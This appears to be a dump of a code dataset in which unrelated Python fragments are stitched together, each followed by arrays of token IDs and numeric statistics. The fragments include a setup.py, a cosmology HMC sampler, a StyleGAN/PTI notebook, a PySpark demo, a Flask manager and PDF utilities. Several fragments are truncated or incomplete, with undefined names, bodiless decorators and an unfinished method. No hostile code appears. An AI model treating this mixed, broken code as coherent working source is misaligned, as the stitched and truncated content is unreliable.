            possible_successor: str = self.get_number() + "." + str(successor_postfix)
            # Membership test via 'in' rather than calling __contains__ directly.
            if possible_successor not in existing_version_numbers:
                return VersionNumber(possible_successor)
            successor_postfix += 1  # otherwise, we try the next option
| [
6738,
19720,
1330,
7343,
11,
23939,
198,
11748,
302,
198,
6738,
2603,
11125,
13,
1069,
4516,
26495,
13,
19044,
37535,
16922,
1330,
18628,
16922,
628,
198,
4871,
10628,
15057,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
770,
1398,... | 2.556465 | 1,222 |
import itertools
import copy
import logging
import datapackage
from dataflows.helpers.resource_matcher import ResourceMatcher
from datapackage_pipelines.wrapper import ingest, spew, get_dependency_datapackage_url
from datapackage_pipelines.utilities.resources import tabular, PROP_STREAMING, \
PROP_STREAMED_FROM
if __name__ == '__main__':
    # Construct the processor and immediately invoke it (callable instance).
    # NOTE(review): ResourceLoader is not defined in this excerpt —
    # presumably declared earlier in the full module; confirm.
    ResourceLoader()()
| [
11748,
340,
861,
10141,
198,
11748,
4866,
198,
11748,
18931,
198,
198,
11748,
4818,
499,
441,
496,
198,
198,
6738,
1366,
44041,
13,
16794,
364,
13,
31092,
62,
6759,
2044,
1330,
20857,
19044,
2044,
198,
198,
6738,
4818,
499,
441,
496,
... | 2.992 | 125 |
from pathlib import Path
from setuptools import setup, find_packages
from alab_management import __version__
# Package metadata and build configuration for alab_management.
setup(
    name="alab_management",
    # Ship every package except the test tree.
    packages=find_packages(exclude=["tests", "tests.*"]),
    # PEP 561 marker file so type checkers pick up the inline annotations.
    package_data={"alab_management": ["py.typed"]},
    version=__version__,
    author="Alab Project Team",
    python_requires=">=3.6",
    description="Workflow management system for alab",
    zip_safe=False,
    # Mirror requirements.txt line-by-line as install-time dependencies.
    install_requires=[
        package.strip("\n")
        for package in (Path(__file__).parent / "requirements.txt").open("r", encoding="utf-8").readlines()],
    include_package_data=True,
    # Console script: running 'alabos' invokes alab_management.scripts.cli:cli.
    entry_points={
        "console_scripts": [
            "alabos = alab_management.scripts.cli:cli",
        ]
    }
)
| [
6738,
3108,
8019,
1330,
10644,
198,
198,
6738,
900,
37623,
10141,
1330,
9058,
11,
1064,
62,
43789,
198,
198,
6738,
435,
397,
62,
27604,
1330,
11593,
9641,
834,
198,
198,
40406,
7,
198,
220,
220,
220,
1438,
2625,
282,
397,
62,
27604,
... | 2.559441 | 286 |
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import tensorflow as tf
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
session = tf.compat.v1.Session(config=config)
import tensorflow_probability as tfp
tfd = tfp.distributions
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
import sys, os, time, argparse
import flowpm
import sys, os, time
sys.path.append('../../galference/utils/')
sys.path.append('../src/')
sys.path.append('/mnt/home/cmodi/Research/Projects/flowpm-pgd')
import tools
import diagnostics as dg
from pmfuncs import Evolve
from pyhmc import PyHMC_fourier, DualAveragingStepSize
from callback import callback_sampling, datafig
import recon
##########
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--eps', type=float, help='step size')
parser.add_argument('--nc', type=int, help='mesh size')
parser.add_argument('--bs', type=float, help='box size')
parser.add_argument('--jobid', type=int, help='an integer for the accumulator')
parser.add_argument('--suffix', type=str, default="", help='suffix to fpath')
parser.add_argument('--nR', type=int, default=0, help="number of smoothings")
parser.add_argument('--scaleprior', type=int, default=1, help="add power to scale to prior")
parser.add_argument('--optinit', type=int, default=1, help="initialize near MAP")
parser.add_argument('--nsamples', type=int, default=5000, help="number of HMC samples")
parser.add_argument('--truecosmo', type=int, default=1, help="use same cosmology for prior and data")
parser.add_argument('--debug', type=int, default=0, help="debug run")
parser.add_argument('--dnoise', type=float, default=1., help='noise level, 1 is shot noise')
parser.add_argument('--Rmin', type=float, default=0., help='Rmin')
parser.add_argument('--kwts', type=int, default=0, help='use kwts')
parser.add_argument('--pamp', type=float, default=1., help='amplitude of initial power')
args = parser.parse_args()
device = args.jobid
##########
nchains = 1
reconiter = 100
#burnin = 200
#mcmciter = 500
#ntrain = 10
tadapt = 100
thinning = 20
lpsteps1, lpsteps2 = 25, 50
allRs = [args.Rmin, 1., 2., 4.]
allR = allRs[:args.nR + 1][::-1]
if args.debug == 1:
nchains = 1
reconiter = 10
burnin = 10
mcmciter = 10
tadapt = 10
thinning = 2
lpsteps1, lpsteps2 = 3, 5
suffix = args.suffix
bs, nc = args.bs, args.nc
nsteps = 3
a0, af, nsteps = 0.1, 1.0, nsteps
stages = np.linspace(a0, af, nsteps, endpoint=True)
donbody = False
order = 1
shotnoise = bs**3/nc**3
dnoise = 1 #shotnoise/nc**1.5
if order == 2: fpath = '/mnt/ceph/users/cmodi/galference/dm_hmc/L%04d_N%04d_LPT'%(bs, nc)
elif order == 1: fpath = '/mnt/ceph/users/cmodi/galference/dm_hmc/L%04d_N%04d_ZA'%(bs, nc)
if suffix == "": fpath = fpath + '/'
else: fpath = fpath + "-" + suffix + '/'
os.makedirs('%s'%fpath, exist_ok=True)
os.makedirs('%s'%fpath + '/figs/', exist_ok=True)
# Compute necessary Fourier kernels
evolve = Evolve(nc, bs, a0=a0, af=af, nsteps = nsteps, donbody=donbody, order=order)
np.random.seed(100)
zic = np.random.normal(0, 1, nc**3).reshape(1, nc, nc, nc)
noise = np.random.normal(0, dnoise, nc**3).reshape(1, nc, nc, nc)
ic = evolve.z_to_lin(zic).numpy()
fin = evolve.pm(tf.constant(ic)).numpy()
data = fin + noise
data = data.astype(np.float32)
tfdata = tf.constant(data)
tfnoise = tf.constant(dnoise)
np.save(fpath + 'ic', ic)
np.save(fpath + 'fin', fin)
np.save(fpath + 'data', data)
fig = datafig(ic, fin, data, bs, dnoise)
plt.savefig(fpath + 'data')
plt.close()
k, pic = tools.power(ic[0], boxsize=bs)
k, pf = tools.power(fin[0], boxsize=bs)
k, pd = tools.power(data[0], boxsize=bs)
k, pn = tools.power(1+noise[0], boxsize=bs)
knoise = evolve.kmesh[evolve.kmesh > k[(pn > pf)][0]].min()
print("Noise dominated after : ", knoise, (evolve.kmesh > knoise).sum()/nc**3)
###################################################################################
##############################################
@tf.function
@tf.function
###################################################################################
###################################################################################
###########Search for good initialization
start = time.time()
seed = 100*device+rank + 2021
np.random.seed(seed)
x0 = np.random.normal(size=nchains*nc**3).reshape(nchains, nc, nc, nc).astype(np.float32) * args.pamp
if args.optinit == 1:
for iR, RR in enumerate(allR):
x0 = recon.map_estimate(evolve, x0, data, RR, maxiter=reconiter)
fig = callback_sampling([evolve.z_to_lin(x0)], ic, bs)
plt.savefig(fpath + '/figs/map%02d-%02d'%(device, RR*10))
plt.close()
print("time taken for Scipy LBFGS : ", time.time() - start)
#Add white noise
if (args.optinit == 1) & (args.scaleprior==1):
print('\nScaling to prior')
if abs(x0.mean()) <1e-1: k, pz = tools.power(x0[0]+1., boxsize = bs)
else: k, pz = tools.power(x0[0], boxsize = bs)
k = k[1:]
pz = pz[1:]
pdiff = (bs/nc)**3 - pz
print(pz, pdiff)
np.save(fpath + 'pdiff%02d'%device, pdiff)
xx, yy = k[pdiff > 0], pdiff[pdiff > 0]
ipkdiff = lambda x: 10**np.interp(np.log10(x), np.log10(xx), np.log10(yy))
x0 = x0 + flowpm.linear_field(nc, bs, ipkdiff, seed=seed).numpy()
else:
pass
#Generate q
q = x0.copy()
#$#if args.kwts == 1:
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**2
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# kwts /= kwts[0, 0, 0]
#$# kwts = np.stack([kwts, kwts], axis=-1)
#$#if args.kwts == 2:
#$# #ikwts
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**2
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# kwts /= kwts[0, 0, 0]
#$# kwts = np.stack([kwts, kwts], axis=-1)
#$# kwts = 1/kwts
#$#if args.kwts == 3:
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**3
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# kwts = np.stack([kwts, kwts], axis=-1)
#$#if args.kwts == 4:
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**3
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# mask = kmesh > knoise
#$# kwts[mask] = knoise**3
#$# kwts = np.stack([kwts, kwts], axis=-1)
#$# kwts /= knoise**3
#$#if args.kwts == 5:
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**3
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# mask = kmesh > knoise
#$# kwts[mask] = knoise**3
#$# kwts = np.stack([kwts, kwts], axis=-1)
#$# kwts /= knoise**3
#$# kwts = 1/kwts
#$#if args.kwts == 6:
#$# kvec = flowpm.kernels.fftk([nc, nc, nc], symmetric=True)
#$# kmesh = (sum((k*nc/bs)**2 for k in kvec)**0.5)
#$# kwts = kmesh**3
#$# kwts[0, 0, 0] = kwts[0, 0, 1]
#$# mask = kmesh > knoise
#$# kwts[mask] = knoise**3
#$# kwts = np.stack([kwts, kwts], axis=-1)
if args.kwts == 7:
kwts = 0.5 * (evolve.kmesh/knoise)**3
kwts[0, 0, 0] = kwts[0, 0, 1]
mask = evolve.kmesh > knoise
kwts[mask] = 0.5
threshold=1e-3
mask2 = kwts < threshold
print(mask2.sum(), mask2.sum()/nc**3)
kwts[mask2] = threshold
else:
kwts = None
################################################################################
################################################################################
####Sampling
print("\nstartng HMC in \n", device, rank, size)
start = time.time()
py_log_prob = lambda x: unnormalized_log_prob(tf.constant(x, dtype=tf.float32), tf.constant(1.)).numpy().astype(np.float32)
py_grad_log_prob = lambda x: grad_log_prob(tf.constant(x, dtype=tf.float32), tf.constant(1.)).numpy().astype(np.float32)
hmckernel = PyHMC_fourier(py_log_prob, py_grad_log_prob, invmetric_diag=kwts)
epsadapt = DualAveragingStepSize(args.eps)
stepsize = args.eps
samples, pyacc = [], []
for i in range(args.nsamples):
print(i)
lpsteps = np.random.randint(lpsteps1, lpsteps2, 1)[0]
q, _, acc, energy, _ = hmckernel.hmc_step(q, lpsteps, stepsize)
prob = np.exp(energy[0] - energy[1])
if acc == 1: print('Accept in device %d with %0.2f'%(device, prob), energy)
else: print('Reject in device %d with %0.2f'%(device, prob), energy)
if i < tadapt:
if np.isnan(prob): prob = 0.
if prob > 1: prob = 1.
stepsize, avgstepsize = epsadapt.update(prob)
print("stepsize and avg : ", stepsize, avgstepsize)
elif i == tadapt:
_, stepsize = epsadapt.update(prob)
print("Step size fixed to : ", stepsize)
np.save(fpath + '/stepsizes%d-%02d'%(device, rank), stepsize)
#append
pyacc.append(acc)
if (i%thinning) == 0:
samples.append(q.astype(np.float32))
print("Finished iteration %d on device %d, rank %d in %0.2f minutes"%(i, device, rank, (time.time()-start)/60.))
print("Acceptance in device %d, rank %d = "%(device, rank), list(zip(np.unique(pyacc), np.unique(pyacc, return_counts=True)[1]/len(pyacc))))
np.save(fpath + '/samples%d-%02d'%(device, rank), np.array(samples))
np.save(fpath + '/accepts%d-%02d'%(device, rank), np.array(pyacc))
fig = callback_sampling([evolve.z_to_lin(i) for i in samples[-10:]], ic, bs)
plt.savefig(fpath + '/figs/iter%02d-%05d'%(device, i))
##########
samples = np.array(samples)
np.save(fpath + '/samples%d-%02d'%(device, rank), np.array(samples))
np.save(fpath + '/accepts%d-%02d'%(device, rank), np.array(pyacc))
end = time.time()
print('Time taken in rank %d= '%rank, end-start)
| [
11748,
299,
32152,
355,
45941,
198,
11748,
2603,
29487,
8019,
198,
6759,
29487,
8019,
13,
1904,
10786,
46384,
11537,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
11250,... | 2.255005 | 4,396 |
from asynctest import mock as async_mock, TestCase as AsyncTestCase
from ......messaging.request_context import RequestContext
from ......messaging.responder import MockResponder
from ......transport.inbound.receipt import MessageReceipt
from ...messages.cred_problem_report import V20CredProblemReport, ProblemReportReason
from .. import cred_problem_report_handler as test_module
| [
6738,
355,
2047,
310,
395,
1330,
15290,
355,
30351,
62,
76,
735,
11,
6208,
20448,
355,
1081,
13361,
14402,
20448,
198,
198,
6738,
47082,
37348,
3039,
13,
25927,
62,
22866,
1330,
19390,
21947,
198,
6738,
47082,
37348,
3039,
13,
5546,
263... | 3.747573 | 103 |
from .lmcut import tokenize
| [
6738,
764,
75,
76,
8968,
1330,
11241,
1096,
198
] | 3.111111 | 9 |
#!/usr/bin/env python
# coding: utf-8
# PyDrive activation Used for bypassing Google Drive download rate limit
# In[ ]:
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
from google.colab import auth
from oauth2client.client import GoogleCredentials
download_with_pydrive = True #@param {type:"boolean"}
downloader = Downloader(download_with_pydrive)
# ## Step 1 - Install Packages required by PTI
# In[ ]:
## Other packages are already builtin in the Colab interpreter
get_ipython().system('pip install wandb')
get_ipython().system('pip install lpips')
## Used for faster inference of StyleGAN by enabling C++ code compilation
get_ipython().system('wget https://github.com/ninja-build/ninja/releases/download/v1.8.2/ninja-linux.zip')
get_ipython().system('sudo unzip ninja-linux.zip -d /usr/local/bin/')
get_ipython().system('sudo update-alternatives --install /usr/bin/ninja ninja /usr/local/bin/ninja 1 --force')
# ## Step 2 - Download Pretrained models
# In[2]:
import os
os.chdir('//home/jp/Documents/gitWorkspace/')
CODE_DIR = 'PTI'
# In[ ]:
get_ipython().system('git clone https://github.com/danielroich/PTI.git $CODE_DIR')
# In[3]:
os.chdir(f'./{CODE_DIR}')
# In[4]:
import os
import sys
import pickle
import numpy as np
from PIL import Image
import torch
from configs import paths_config, hyperparameters, global_config
from utils.align_data import pre_process_images
from scripts.run_pti import run_PTI
from IPython.display import display
import matplotlib.pyplot as plt
from scripts.latent_editor_wrapper import LatentEditorWrapper
# In[ ]:
current_directory = os.getcwd()
save_path = os.path.join(os.path.dirname(current_directory), CODE_DIR, "pretrained_models")
os.makedirs(save_path, exist_ok=True)
# In[ ]:
## Download pretrained StyleGAN on FFHQ 1024x1024
downloader.download_file("125OG7SMkXI-Kf2aqiwLLHyCvSW-gZk3M", os.path.join(save_path, 'ffhq.pkl'))
# In[ ]:
## Download Dlib tool for alingment, used for preprocessing images before PTI
downloader.download_file("1xPmn19T6Bdd-_RfCVlgNBbfYoh1muYxR", os.path.join(save_path, 'align.dat'))
# ## Step 3 - Configuration Setup
# In[ ]:
image_dir_name = 'image'
## If set to true download desired image from given url. If set to False, assumes you have uploaded personal image to
## 'image_original' dir
use_image_online = True
image_name = 'personal_image'
use_multi_id_training = False
global_config.device = 'cuda'
paths_config.e4e = '/home/jp/Documents/gitWorkspace/PTI/pretrained_models/e4e_ffhq_encode.pt'
paths_config.input_data_id = image_dir_name
paths_config.input_data_path = f'/home/jp/Documents/gitWorkspace/PTI/{image_dir_name}_processed'
paths_config.stylegan2_ada_ffhq = '/home/jp/Documents/gitWorkspace/PTI/pretrained_models/ffhq.pkl'
paths_config.checkpoints_dir = '/home/jp/Documents/gitWorkspace/PTI/'
paths_config.style_clip_pretrained_mappers = '/home/jp/Documents/gitWorkspace/PTI/pretrained_models'
hyperparameters.use_locality_regularization = False
# ## Step 4 - Preproccess Data
# In[ ]:
os.makedirs(f'./{image_dir_name}_original', exist_ok=True)
os.makedirs(f'./{image_dir_name}_processed', exist_ok=True)
os.chdir(f'./{image_dir_name}_original')
# In[ ]:
## Download real face image
## If you want to use your own image skip this part and upload an image/images of your choosing to image_original dir
if use_image_online:
get_ipython().system('wget -O personal_image.jpg https://static01.nyt.com/images/2019/09/09/opinion/09Hunter1/09Hunter1-superJumbo.jpg ## Photo of Sarena Wiliams')
# In[ ]:
original_image = Image.open(f'{image_name}.jpg')
original_image
# In[ ]:
os.chdir('/home/jp/Documents/gitWorkspace/PTI')
# In[ ]:
pre_process_images(f'/home/jp/Documents/gitWorkspace/PTI/{image_dir_name}_original')
# In[ ]:
aligned_image = Image.open(f'/home/jp/Documents/gitWorkspace/PTI/{image_dir_name}_processed/{image_name}.jpeg')
aligned_image.resize((512,512))
# ## Step 5 - Invert images using PTI
# In order to run PTI and use StyleGAN2-ada, the cwd should the parent of 'torch_utils' and 'dnnlib'.
#
# In case use_multi_id_training is set to True and many images are inverted simultaneously
# activating the regularization to keep the *W* Space intact is recommended.
#
# If indeed the regularization is activated then please increase the number of pti steps from 350 to 450 at least
# using hyperparameters.max_pti_steps
# In[ ]:
os.chdir('/home/jp/Documents/gitWorkspace/PTI')
model_id = run_PTI(use_wandb=False, use_multi_id_training=use_multi_id_training)
# ## Visualize results
# In[ ]:
# In[ ]:
# In[ ]:
generator_type = paths_config.multi_id_model_type if use_multi_id_training else image_name
old_G, new_G = load_generators(model_id, generator_type)
# In[ ]:
# If multi_id_training was used for several images.
# You can alter the w_pivot index which is currently configured to 0, and then running
# the visualization code again. Using the same generator on different latent codes.
# In[ ]:
w_path_dir = f'{paths_config.embedding_base_dir}/{paths_config.input_data_id}'
embedding_dir = f'{w_path_dir}/{paths_config.pti_results_keyword}/{image_name}'
w_pivot = torch.load(f'{embedding_dir}/0.pt')
# In[ ]:
old_image = old_G.synthesis(w_pivot, noise_mode='const', force_fp32 = True)
new_image = new_G.synthesis(w_pivot, noise_mode='const', force_fp32 = True)
# In[ ]:
print('Upper image is the inversion before Pivotal Tuning and the lower image is the product of pivotal tuning')
plot_syn_images([old_image, new_image])
# ## InterfaceGAN edits
# In[ ]:
latent_editor = LatentEditorWrapper()
latents_after_edit = latent_editor.get_single_interface_gan_edits(w_pivot, [-2, 2])
# In order to get different edits. Such as younger face or make the face smile more. Please change the factors passed to "get_single_interface_gan_edits".
# Currently the factors are [-2,2]. You can pass for example: range(-3,3)
# In[ ]:
for direction, factor_and_edit in latents_after_edit.items():
print(f'Showing {direction} change')
for latent in factor_and_edit.values():
old_image = old_G.synthesis(latent, noise_mode='const', force_fp32 = True)
new_image = new_G.synthesis(latent, noise_mode='const', force_fp32 = True)
plot_syn_images([old_image, new_image])
# ## StyleCLIP editing
# ### Download pretrained models
# In[ ]:
mappers_base_dir = '/home/jp/Documents/gitWorkspace/PTI/pretrained_models'
# In[ ]:
# More pretrained mappers can be found at: "https://github.com/orpatashnik/StyleCLIP/blob/main/utils.py"
# Download Afro mapper
downloader.download_file("1i5vAqo4z0I-Yon3FNft_YZOq7ClWayQJ", os.path.join(mappers_base_dir, 'afro.pt'))
# In[ ]:
# Download Mohawk mapper
downloader.download_file("1oMMPc8iQZ7dhyWavZ7VNWLwzf9aX4C09", os.path.join(mappers_base_dir, 'mohawk.pt'))
# In[ ]:
# Download e4e encoder, used for the first inversion step instead on the W inversion.
downloader.download_file("1cUv_reLE6k3604or78EranS7XzuVMWeO", os.path.join(mappers_base_dir, 'e4e_ffhq_encode.pt'))
# ### Use PTI with e4e backbone for StyleCLIP
# In[ ]:
# Changing first_inv_type to W+ makes the PTI use e4e encoder instead of W inversion in the first step
hyperparameters.first_inv_type = 'w+'
os.chdir('/home/jp/Documents/gitWorkspace/PTI')
model_id = run_PTI(use_wandb=False, use_multi_id_training=use_multi_id_training)
# ### Apply edit
# In[ ]:
from scripts.pti_styleclip import styleclip_edit
# In[ ]:
paths_config.checkpoints_dir = '/home/jp/Documents/gitWorkspace/PTI'
os.chdir('/home/jp/Documents/gitWorkspace/PTI')
styleclip_edit(use_multi_id_G=use_multi_id_training, run_id=model_id, edit_types = ['afro'], use_wandb=False)
styleclip_edit(use_multi_id_G=use_multi_id_training, run_id=model_id, edit_types = ['mohawk'], use_wandb=False)
# In[ ]:
original_styleCLIP_path = f'/home/jp/Documents/gitWorkspace/PTI/StyleCLIP_results/{image_dir_name}/{image_name}/e4e/{image_name}_afro.jpg'
new_styleCLIP_path = f'/home/jp/Documents/gitWorkspace/PTI/StyleCLIP_results/{image_dir_name}/{image_name}/PTI/{image_name}_afro.jpg'
original_styleCLIP = Image.open(original_styleCLIP_path).resize((256,256))
new_styleCLIP = Image.open(new_styleCLIP_path).resize((256,256))
# In[ ]:
display_alongside_source_image([original_styleCLIP, new_styleCLIP])
# In[ ]:
original_styleCLIP_path = f'/home/jp/Documents/gitWorkspace/PTI/StyleCLIP_results/{image_dir_name}/{image_name}/e4e/{image_name}_mohawk.jpg'
new_styleCLIP_path = f'/home/jp/Documents/gitWorkspace/PTI/StyleCLIP_results/{image_dir_name}/{image_name}/PTI/{image_name}_mohawk.jpg'
original_styleCLIP = Image.open(original_styleCLIP_path).resize((256,256))
new_styleCLIP = Image.open(new_styleCLIP_path).resize((256,256))
# In[ ]:
display_alongside_source_image([original_styleCLIP, new_styleCLIP])
# ## Other methods comparison
# ### Invert image using other methods
# In[ ]:
from scripts.latent_creators import e4e_latent_creator
from scripts.latent_creators import sg2_latent_creator
from scripts.latent_creators import sg2_plus_latent_creator
# In[ ]:
e4e_latent_creator = e4e_latent_creator.E4ELatentCreator()
e4e_latent_creator.create_latents()
sg2_latent_creator = sg2_latent_creator.SG2LatentCreator(projection_steps = 600)
sg2_latent_creator.create_latents()
sg2_plus_latent_creator = sg2_plus_latent_creator.SG2PlusLatentCreator(projection_steps = 1200)
sg2_plus_latent_creator.create_latents()
# In[ ]:
inversions = {}
sg2_embedding_dir = f'{w_path_dir}/{paths_config.sg2_results_keyword}/{image_name}'
inversions[paths_config.sg2_results_keyword] = torch.load(f'{sg2_embedding_dir}/0.pt')
e4e_embedding_dir = f'{w_path_dir}/{paths_config.e4e_results_keyword}/{image_name}'
inversions[paths_config.e4e_results_keyword] = torch.load(f'{e4e_embedding_dir}/0.pt')
sg2_plus_embedding_dir = f'{w_path_dir}/{paths_config.sg2_plus_results_keyword}/{image_name}'
inversions[paths_config.sg2_plus_results_keyword] = torch.load(f'{sg2_plus_embedding_dir}/0.pt')
# In[ ]:
# In[ ]:
# In[ ]:
for inv_type, latent in inversions.items():
print(f'Displaying {inv_type} inversion')
plot_image_from_w(latent, old_G)
print(f'Displaying PTI inversion')
plot_image_from_w(w_pivot, new_G)
# In[ ]:
# In[ ]:
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
2,
9485,
24825,
14916,
16718,
329,
17286,
278,
3012,
9974,
4321,
2494,
4179,
198,
198,
2,
554,
58,
2361,
25,
628,
198,
6738,
279,
5173,
11... | 2.645228 | 3,887 |
import pyspark
from pyspark import SparkConf
from pyspark.sql import SparkSession
spark = SparkSession \
.builder \
.appName("Our first Python Spark SQL example") \
.getOrCreate()
spark.sparkContext.getConf().getAll()
spark
path = "./data/sparkify_log_small.json"
user_log = spark.read.json(path)
user_log.printSchema()
user_log.describe()
user_log.show(n=1)
user_log.take(5)
out_path = "data/sparkify_log_small.csv"
user_log.write.save(out_path, format="csv", header=True)
user_log_2 = spark.read.csv(out_path, header=True)
user_log_2.printSchema()
user_log_2.take(2)
user_log_2.select("userID").show()
user_log_2.take(1)
| [
11748,
279,
893,
20928,
198,
6738,
279,
893,
20928,
1330,
17732,
18546,
198,
6738,
279,
893,
20928,
13,
25410,
1330,
17732,
36044,
198,
198,
2777,
668,
796,
17732,
36044,
3467,
198,
220,
220,
220,
764,
38272,
3467,
198,
220,
220,
220,
... | 2.478764 | 259 |
from django.forms import ModelForm
from .models import Comment, Reply | [
6738,
42625,
14208,
13,
23914,
1330,
9104,
8479,
198,
6738,
764,
27530,
1330,
18957,
11,
14883
] | 4.3125 | 16 |
#! /usr/bin/env python
from flask.ext.script import Manager
from flask.ext.script.commands import ShowUrls, Clean
from <%= appName %> import create_app<% if (databaseMapper === 'sqlalchemy') { -%>, db<% } %>
app = create_app("development")
manager = Manager(app)
manager.add_command("show-urls", ShowUrls())
manager.add_command("clean", Clean())
@manager.shell
def make_shell_context():
""" Creates a python REPL with several default imports
in the context of the app
"""
return dict(app=app<% if (databaseMapper === 'sqlalchemy') { -%>, db=db<% } %>)
<% if (databaseMapper === 'sqlalchemy') { -%>
@manager.command
def createdb():
""" Creates a database with all of the tables defined in
your SQLAlchemy models
"""
db.create_all()
<% } -%>
@manager.command
def test():
""" flake8 and run all your tests using py.test
"""
import pytest
pytest.main("--cov=<%= appName %> --mccabe --flakes tests")
if __name__ == '__main__':
manager.run()
| [
2,
0,
1220,
14629,
14,
8800,
14,
24330,
21015,
198,
6738,
42903,
13,
2302,
13,
12048,
1330,
9142,
198,
6738,
42903,
13,
2302,
13,
12048,
13,
9503,
1746,
1330,
5438,
16692,
7278,
11,
5985,
198,
198,
6738,
1279,
4,
28,
598,
5376,
4064... | 2.749319 | 367 |
import numpy as np
from sklearn.utils.validation import check_X_y, check_is_fitted
| [
11748,
299,
32152,
355,
45941,
198,
6738,
1341,
35720,
13,
26791,
13,
12102,
341,
1330,
2198,
62,
55,
62,
88,
11,
2198,
62,
271,
62,
38631,
628
] | 3.111111 | 27 |
from django.urls import path
from . import views
app_name = 'network'
urlpatterns = [
path('', views.Index.as_view(), name='index'),
path('create-subscriber/', views.CreateSubscriber.as_view(), name='create-subscriber'),
]
| [
6738,
42625,
14208,
13,
6371,
82,
1330,
3108,
198,
6738,
764,
1330,
5009,
198,
198,
1324,
62,
3672,
796,
705,
27349,
6,
198,
198,
6371,
33279,
82,
796,
685,
198,
220,
220,
220,
3108,
10786,
3256,
5009,
13,
15732,
13,
292,
62,
1177,
... | 2.807229 | 83 |
"""PDF utilities
"""
import collections
import fpdf
import os
import pathlib
import PyPDF2 as pypdf
import tempfile
import time
import typing
import apsjournals
ArticleMeta = collections.namedtuple('ArticleMeta', 'article file pages')
LinkMeta = collections.namedtuple('LinkMeta', 'source_page target_page x y w h')
BookmarkMeta = collections.namedtuple('BookmarkMeta', 'name page parent')
def clean_path(path: str):
"""Clean path for pdf article"""
return path.replace(',', '')
def get_issue_meta(issue, dir: str, throttle: int=2) -> typing.List[ArticleMeta]:
"""Download Issue contents and return meta data about where the articles
have been download.
Args:
issue:
Issue, the issue whose articles to download
dir:
str, the directory name
throttle:
int, the number of seconds between downloads, used to
Returns:
"""
if not os.path.exists(dir):
os.mkdir(dir)
meta = []
for article in issue.articles:
time.sleep(throttle)
path = os.path.join(dir, clean_path(article.name)) + '.pdf'
article.pdf(path)
with open(path, 'rb') as fid:
meta.append(ArticleMeta(article, path, pypdf.PdfFileReader(fid).getNumPages()))
return meta
class ApsPDF(fpdf.FPDF):
"""Create a PDF of all issue contents with Table of Contents"""
####################### META DATA CURATION #######################
####################### OVERRIDDEN METHODS #######################
####################### ADDITIONAL PAGES #######################
def add_page_cover(self):
"""Add cover page"""
self.add_page()
self.cell(0, 50, '', ln=1) # padding
self.set_font_size(20)
self.cell(0, 10, self._meta_issue.vol.journal.name, align='C', ln=1)
self.cell(0, 10, "Volume {:d} Issue {:d}".format(self._meta_issue.vol.num, self._meta_issue.num), align='C', ln=1)
# self.cell(0, 170, '', ln=1) # padding
def add_page_contents(self, meta_cache):
"""Add Table of Contents"""
self.add_page()
max_authors = 10
line_items = list(self._meta_issue.contents(True))
contents_pages = len(line_items) * 10 // 208 + 1 + 1
page = contents_pages + 1
for level, member in line_items:
if member.__class__.__name__ == 'Section': # figure out dependency issue here
self.set_font('Arial', style='', size=16 - 2 * level)
self.cell(0, 10, txt=member.name, ln=1)
else: # Article
meta = meta_cache[member.name]
indent = 10 * ' '
# Create link
link = LinkMeta(self.page_no() - 1, page, None, None, None, None)
# add article title
self.set_font('Arial', style='I', size=10)
self.cell(50, 7, txt=indent + member.name, ln=0, meta_link=link)
# add page number at end of title line
self.set_font('Arial', style='', size=10)
self.cell(0, 7, txt=str(page + contents_pages), ln=1, align='R')
# add author line
self.set_font('Arial', style='', size=8)
author_text = 2 * indent + ', '.join(a.last_name for a in member.authors[:max_authors]) + (' et. al.' if len(member.authors) > max_authors else '')
self.cell(10, 2, txt=author_text, ln=1, meta_link=link) # author name
self.cell(10, 4, txt='', ln=1) # padding below author name
page = page + meta.pages
####################### META INFO BUILDERS #######################
def add_bookmarks(self):
"""Add bookmarks to document"""
with open(self._meta_out_file, 'wb') as out_fid:
with open(self._meta_pre_path, 'rb') as pre_fid:
reader = pypdf.PdfFileReader(pre_fid)
writer = pypdf.PdfFileWriter()
page_bookmarks = {b.page: [] for b in self._meta_bookmarks} # TODO refactor for defaultdict
for b in self._meta_bookmarks:
page_bookmarks[b.page].append(b)
bookmark_cache = {}
page_links = {l.target_page: l for l in self._meta_links}
for n in range(reader.getNumPages()):
writer.addPage(reader.getPage(pageNumber=n))
if n == 1:
writer.addBookmark('Cover', 0)
elif n == 2:
writer.addBookmark('Contents', 1)
elif n in page_bookmarks:
for bookmark in page_bookmarks[n]:
bookmark_handle = writer.addBookmark(bookmark.name, bookmark.page, parent=bookmark_cache.get(bookmark.parent, None))
bookmark_cache[bookmark] = bookmark_handle
# if n in page_links: # TODO resolve the mismatched placement of the links
# link = page_links[n]
# print('Adding Link: ({:d}, {:d}, {:d}, {:d}) {:d} -> {:d}'.format(link.h, link.w, link.x, link.y, link.source_page, link.target_page))
# writer.addLink(link.source_page, link.target_page, rect=(link.x, link.y, link.w, link.h))
writer.write(out_fid)
def cleanup(self):
